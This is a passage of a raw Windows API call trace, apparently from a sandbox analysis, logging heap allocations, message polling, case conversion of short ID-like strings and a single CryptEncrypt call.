| out: hHeap=0x25c0000) returned 1 [0256.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.319] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.320] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.320] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.320] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.320] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.320] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.320] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.321] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.321] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.321] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.322] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.322] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.322] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.322] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.322] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.323] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.323] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.324] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.324] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.324] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.325] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34e2950 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.329] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x18374, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x18378) returned 1 [0256.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.330] PeekMessageW (in: 